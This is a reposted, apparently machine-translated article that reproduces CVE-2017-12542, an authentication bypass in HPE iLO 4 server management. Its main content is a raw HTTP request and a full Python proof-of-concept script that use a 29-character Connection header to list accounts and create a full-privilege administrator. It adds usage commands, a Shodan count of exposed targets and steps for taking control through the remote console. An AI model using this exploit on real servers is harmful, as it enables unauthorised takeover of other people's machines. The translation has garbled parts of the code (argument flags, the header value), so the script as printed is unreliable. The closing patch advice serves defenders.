Shulou(Shulou.com)05/31 Report--

This article introduces how to carry out the simple analysis and reproduction of CVE-2017-12542. The content is very detailed. Interested friends can use it for reference. I hope it will be helpful to you.

Brief introduction

CVE-2017-12542 is a high-score vulnerability of CVSS 9.8.It has simple exploiting conditions and great harm. For nearly a decade, iLO has been a server management solution embedded in almost all HP servers. It provides the required functions for system administrators by means of remote management. Including power management, remote system console, remote CD/DVD image installation and so on. A vulnerability in HPE Integrated Lights-Out 4 (iLO 4) may allow remote unauthenticated attackers to bypass authentication and execute arbitrary code.

Brief analysis

In general, the login interface of iLO is shown in the following figure:

When visiting

Https://127.0.0.1:8443/rest/v1/AccountService/Accounts

HTTP/1.1 401 Unauthorized is returned when the

After adding 29 characters greater than or equal to 29 characters in the Connection of the HTTP header, you can bypass authentication (the following figure shows the iLO login user name of the target successfully obtained):

Add a user's packet to the destination post, and the Connection still uses 29 A's to successfully add the user:

POST / rest/v1/AccountService/Accounts HTTP/1.1Host: 127.0.0.1:8443Content-Length: 273Accept-Encoding: gzip, deflateAccept: * / * Connection: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAContent-Type: application/json {"UserName": "administratar", "Password": "admin@123", "Oem": {"Hp": {"RemoteConsolePriv": true, "iLOConfigPriv": true, "VirtualMediaPriv": true, "UserConfigPriv": true, "VirtualPowerAndResetPriv": true, "LoginPriv": true} LoginName: "administratar"}

The added user can log in successfully and have complete control rights:

Reappearance and utilization

In shodan, there are about 8800 search results with HP-iLO-Server as keyword, mainly in the United States, Hong Kong, the United Kingdom and so on.

We can use skelsec's PoC to validate the target:

#! / usr/bin/env python "" Exploit trigger was presented @ reconbrx 2018Vulnerability found and documented by synacktiv: https://www.synacktiv.com/posts/exploit/rce-vulnerability-in-hp-ilo.htmlOriginal advisory from HP: https://support.hpe.com/hpsc/doc/public/display?docId=hpesbhf03769en_usOther advisories for this CVE: https://tools.cisco.com/security/center/viewAlert.x?alertId=54930https://securitytracker.com/id/1039222http://www.exploit-db.com/ Exploits/44005 https://packetstormsecurity.com/files/146303/HPE-iLO4-Add-New-Administrator-User.htmlhttps://vulndb.cyberriskanalytics.com/164082IMPORTANT: THIS EXPLOIT IS JUST FOR ONE OUT OF THE THREE VULNERABILITES COVERED BY CVE-2017-12542 thanks to the two other vulns are critical as well But only triggerable on the host itself. "import requestsfrom requests.packages.urllib3.exceptions import InsecureRequestWarningimport jsonimport urllib3# All of the HP iLO interfaces run on HTTPS But most of them are using self-signed SSL cert.urllib3.disable_warnings (urllib3.exceptions.InsecureRequestWarning) requests.packages.urllib3.disable_warnings (InsecureRequestWarning) exploit_trigger = {'Connection':' Aids 29} accounts_url = 'https://%s/rest/v1/AccountService/Accounts'def test (ip): url = accounts_url% ip try: response = requests.get (url, headers = exploit_trigger, verify = False) except Exception as e: return False 'Could not connect to target% s, Reason:% s'% (ip, str (e)) try: data = json.loads (response.text) except Exception as e: return False, 'Target response not as qualified, Exception data:% s'% (str (e),) return True, datadef exploit (ip, username, password): Oem = {'Hp': {' LoginName': username 'Privileges': {' LoginPriv': True, 'RemoteConsolePriv': True,' UserConfigPriv': True, 'VirtualMediaPriv': True,' iLOConfigPriv':True, 'VirtualPowerAndResetPriv':True,} body = {' UserName':username 'Password':password,' Oem':Oem} url = accounts_url% ip try: response = requests.post (url, json=body, headers = exploit_trigger, verify = False) except Exception as e: return False, 'Could not connect to target% s, Reason:% s'% (ip, str (e)) if response.status_code in [requests.codes.ok, requests.codes.created]: return True Response.text else: return False, 'Server returned status code% d, data:% s'% (response.status_code, response.text) if _ _ name__ ='_ _ main__': import argparse import sys parser = argparse.ArgumentParser (description='CVE-2017-12542 Tester and Exploiter script.') Parser.add_argument ('ip', help='target IP') parser.add_argument ('-tween, action='store_true', default=True, help='Test. Trigger the exploit and list all users') parser.add_argument ('- eyed, action='store_true', default=False, help='Exploit. Create a new admin user with the credentials specified in-u and-p') parser.add_argument ('- upright, help='username of the new admin user') parser.add_argument ('- paired, help='password of the new admin user') args = parser.parse_args () if args.e: if args.u is None or args.p is None: print ('Username and password must be set for exploiting') Sys.exit () res, data = exploit (args.ip, args.u, args.p) if res: print ('[+] Successfully added username') Else: print ('[-] Error!% s'% data) elif args.t: res, data = test (args.ip) if res: print ('[+] Target is VULNERABLES') For i in data ['Items']: print (' [+] Account name:% s Username:% s Username:% s'% (I ['Name'], I [' Oem'] ['Hp'] [' LoginName']) else: print ('[-] Error!% s'% data)

The usage is as follows:

Python hp_iLO_4_exp-CVE-2017-12542.py-e-u administratar-p admin@123 ip:port

You can add a user whose username is administratar and password is admin@123:

Using hp's HP iLO Integrated Remote Console, you can remotely link to the destination at the download address: https://support.hpe.com/hpsc/swd/public/detail?swItemId=MTX_4f842ceb31cf48d392e22705a8, there are two ways to connect to the destination:

1. Open HP iLO Integrated Remote Console and fill in the corresponding information in the pop-up prompt.

2. Click Java Web Start in information- > overview- > on the home page to download a jnlp file and open it to connect automatically.

Complete control of the target can be obtained after connection:

Vulnerability repair

Hewlett-Packard has fixed this vulnerability in the newer version (version 2.53 or later). The vulnerability can be fixed by firmware upgrade. Get a link to the patch: firmware can be downloaded from the following address: http://www.hpe.com/support/ilo4https://support.hpe.com/hpsc/doc/public/display?docId=hpesbhf03769en_us

This is the end of the simple analysis and reproduction of CVE-2017-12542. I hope the above content can be helpful to you and learn more knowledge. If you think the article is good, you can share it for more people to see.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.